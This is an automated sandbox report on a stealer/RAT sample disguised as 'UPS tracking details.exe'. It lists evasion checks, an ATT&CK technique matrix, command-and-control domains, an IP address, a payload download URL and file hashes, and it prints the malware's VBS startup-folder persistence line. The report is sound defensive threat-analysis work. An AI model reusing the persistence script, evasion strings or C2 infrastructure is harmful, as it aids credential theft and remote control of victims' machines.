                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: UPS tracking details.exe PID: 3164, type: MEMORYSTR
                    Source: UPS tracking details.exe, 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\UPS tracking details.exeMemory allocated: 7D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeMemory allocated: 24C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeMemory allocated: 10E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeMemory allocated: 2B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeMemory allocated: 4B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: UPS tracking details.exe, 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                    Source: UPS tracking details.exe, 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                    Source: UPS tracking details.exe, 00000001.00000002.1681842901.0000000000874000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, NativeMethods.csReference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
                    Source: 1.2.UPS tracking details.exe.37b4e00.2.raw.unpack, ResourceReferenceValue.csReference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess created: C:\Users\user\Desktop\UPS tracking details.exe "C:\Users\user\Desktop\UPS tracking details.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeQueries volume information: C:\Users\user\Desktop\UPS tracking details.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeQueries volume information: C:\Users\user\Desktop\UPS tracking details.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UPS tracking details.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: UPS tracking details.exe, type: SAMPLE
                    Source: Yara matchFile source: 1.0.UPS tracking details.exe.e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000000.1536927005.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Remaining.exe, type: DROPPED
                    Source: Yara matchFile source: 1.2.UPS tracking details.exe.27756d4.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.UPS tracking details.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1682564416.00000000029ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UPS tracking details.exe PID: 3164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: UPS tracking details.exe PID: 6572, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: UPS tracking details.exe, type: SAMPLE
                    Source: Yara matchFile source: 1.0.UPS tracking details.exe.e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000000.1536927005.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Remaining.exe, type: DROPPED
                    Source: Yara matchFile source: 1.2.UPS tracking details.exe.27756d4.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.UPS tracking details.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1682564416.00000000029ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UPS tracking details.exe PID: 3164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: UPS tracking details.exe PID: 6572, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting
                    Valid Accounts1
                    Scheduled Task/Job
                    1
                    Scripting
                    11
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping211
                    Security Software Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Data Obfuscation
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API
                    1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    2
                    Virtualization/Sandbox Evasion
                    LSASS Memory2
                    Virtualization/Sandbox Evasion
                    Remote Desktop ProtocolData from Removable Media1
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Registry Run Keys / Startup Folder
                    2
                    Registry Run Keys / Startup Folder
                    1
                    Disable or Modify Tools
                    Security Account Manager1
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Ingress Tool Transfer
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    NTDS13
                    System Information Discovery
                    Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA SecretsInternet Connection DiscoverySSHKeylogging12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information
                    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Software Packing
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    UPS tracking details.exe21%ReversingLabs
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Remaining.exe21%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    bin14.ydns.eu0%Avira URL Cloudsafe
                    smfcs3.ydns.eu0%Avira URL Cloudsafe
                    bin12.ydns.eu0%Avira URL Cloudsafe
                    kingsbkup1.ydns.eu0%Avira URL Cloudsafe
                    http://win32.ydns.eu/never/lookinto/it/panel/uploads/Fjuzaw.pdf0%Avira URL Cloudsafe
                    smfcs1.ydns.eu0%Avira URL Cloudsafe
                    http://win32.ydns.eu0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    win32.ydns.eu
                    45.144.214.104
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      smfcs3.ydns.eutrue
                      • Avira URL Cloud: safe
                      unknown
                      kingsbkup1.ydns.eutrue
                      • Avira URL Cloud: safe
                      unknown
                      bin14.ydns.eutrue
                      • Avira URL Cloud: safe
                      unknown
                      http://win32.ydns.eu/never/lookinto/it/panel/uploads/Fjuzaw.pdftrue
                      • Avira URL Cloud: safe
                      unknown
                      bin12.ydns.eutrue
                      • Avira URL Cloud: safe
                      unknown
                      smfcs1.ydns.eutrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.cloudinary.comUPS tracking details.exe, 00000001.00000002.1682564416.0000000002581000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://github.com/mgravell/protobuf-netiUPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://stackoverflow.com/q/14436606/23354UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://github.com/mgravell/protobuf-netJUPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://stackoverflow.com/q/11564914/23354;UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://stackoverflow.com/q/2152978/23354UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://win32.ydns.euUPS tracking details.exe, 00000001.00000002.1682564416.0000000002581000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/mgravell/protobuf-netUPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.nuget.org/packages/Newtonsoft.Json.BsonRemaining.exe.1.drfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUPS tracking details.exe, 00000001.00000002.1682564416.0000000002581000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://james.newtonking.com/projects/jsonUPS tracking details.exe, 00000001.00000002.1682564416.0000000002581000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.newtonsoft.com/jsonschemaUPS tracking details.exe, Remaining.exe.1.drfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            45.144.214.104
                                            win32.ydns.euUkraine
                                            47169HPC-MVM-ASHUfalse
                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1627808
                                            Start date and time:2025-03-03 08:44:24 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 54s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:10
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:UPS tracking details.exe
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winEXE@4/3@1/1
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HCA Information:
                                            • Successful, ratio: 72%
                                            • Number of executed functions: 50
                                            • Number of non-executed functions: 13
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 172.202.163.200, 4.245.163.56
                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target UPS tracking details.exe, PID 6572 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            TimeTypeDescription
                                            08:46:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Remaining.vbs
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            45.144.214.104Enquiry#039855.exeGet hashmaliciousXWormBrowse
                                            • win32.ydns.eu/never/lookinto/it/panel/uploads/Tnemxaef.vdf
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            win32.ydns.euEnquiry#039855.exeGet hashmaliciousXWormBrowse
                                            • 45.144.214.104
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            HPC-MVM-ASHU1ZXaFij.exeGet hashmaliciousXmrigBrowse
                                            • 45.144.212.77
                                            Enquiry#039855.exeGet hashmaliciousXWormBrowse
                                            • 45.144.214.104
                                            Auftragsbest#U00e4tigung.exeGet hashmaliciousQuasarBrowse
                                            • 45.144.214.107
                                            IRSTaxRefund.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                            • 45.144.214.126
                                            SCS AWB and Commercial Invoice.exeGet hashmaliciousSnake Keylogger, XWormBrowse
                                            • 45.144.214.104
                                            PaRWfF3x5K.elfGet hashmaliciousUnknownBrowse
                                            • 45.131.150.253
                                            6uBxa0vGQt.elfGet hashmaliciousGafgytBrowse
                                            • 213.181.218.192
                                            SoqyJuUVvW.elfGet hashmaliciousMiraiBrowse
                                            • 45.131.150.244
                                            NJh7IrK6IZ.elfGet hashmaliciousMiraiBrowse
                                            • 45.131.150.235
                                            Purchase Order_NO3682720.xlam.xlsxGet hashmaliciousUnknownBrowse
                                            • 45.144.214.37
                                            No context
                                            No context
                                            Process:C:\Users\user\Desktop\UPS tracking details.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):88
                                            Entropy (8bit):4.777756199098866
                                            Encrypted:false
                                            SSDEEP:3:FER/n0eFHHo0nacwREaKC5wS42LAuHn:FER/lFHIcNwiaZ5wS4sAI
                                            MD5:3ACE037A2D117839F3613C0B9E00D855
                                            SHA1:D9A09126F2CB5513DA05AFA540821CBD456995D9
                                            SHA-256:DA19B480FC9AD8F705E165387C26F7B3CD4D5DF00E1DCDD65930C7A219264343
                                            SHA-512:F7921D6F6864C120385D999321B7DCD57DA1D94E4991CD76FC7D3CEB4816B973D5B332A81BC434B76423333239BA8C1DB1B62B8180A6343F1CC87904959C0637
                                            Malicious:true
                                            Reputation:low
                                            Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Remaining.exe"""
                                            Process:C:\Users\user\Desktop\UPS tracking details.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):871424
                                            Entropy (8bit):7.242522011500155
                                            Encrypted:false
                                            SSDEEP:12288:vWMnQ1Kfk7AEYQCJSsFlsIQfYl2N3qWkj9d/qArFK6eNXwC94EBTR+:uj7AEYQCQaKbA63+jPqAUNXjBBT0
                                            MD5:28BADF3EB1AA6CE975FEE86E6EC1DC14
                                            SHA1:8F19C7DBDDE308E463B0412D73EA7083B1BCC816
                                            SHA-256:7F1764A28D27F381701D9254166241607A37A02EB2FE80D682BAF15236DA5B7E
                                            SHA-512:EB5DA8590065D4A289C75C4F3D3124ECC854398A7E846DDB2C2AEC5D136817E393CE8881C539B08D0F3EEE79E56CCAB5DBE0E57054ECCBE97769189CC73F356E
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Remaining.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 21%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .g.................B...........a... ........@.. ....................................`.................................pa..K.................................................................................... ............... ..H............text....A... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B.................a......H.......|...L................i..........................................B(:...(....(....*..."+.(..:Z*....0.............*.0..........+.(.V.3.(....o.......(....*..(:...*..0.............*................................*....(:...*..0.............*.0.............*.0.............*.(:...*..0.............*A4......................................................*....(:...*..0.............*.(.......'........../G......................*....(:...*..0.............*....................*...
                                            Process:C:\Users\user\Desktop\UPS tracking details.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.242522011500155
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:UPS tracking details.exe
                                            File size:871'424 bytes
                                            MD5:28badf3eb1aa6ce975fee86e6ec1dc14
                                            SHA1:8f19c7dbdde308e463b0412d73ea7083b1bcc816
                                            SHA256:7f1764a28d27f381701d9254166241607a37a02eb2fe80d682baf15236da5b7e
                                            SHA512:eb5da8590065d4a289c75c4f3d3124ecc854398a7e846ddb2c2aec5d136817e393ce8881c539b08d0f3eee79e56ccab5dbe0e57054eccbe97769189cc73f356e
                                            SSDEEP:12288:vWMnQ1Kfk7AEYQCJSsFlsIQfYl2N3qWkj9d/qArFK6eNXwC94EBTR+:uj7AEYQCQaKbA63+jPqAUNXjBBT0
                                            TLSH:47058D6B6302CE19D7D52A753A67A1385331CD72E127BB4B261C217E1CE33791E863CA
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .g.................B...........a... ........@.. ....................................`................................
                                            Icon Hash:90cececece8e8eb0
                                            Entrypoint:0x4d61be
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x67C5209C [Mon Mar 3 03:23:08 2025 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
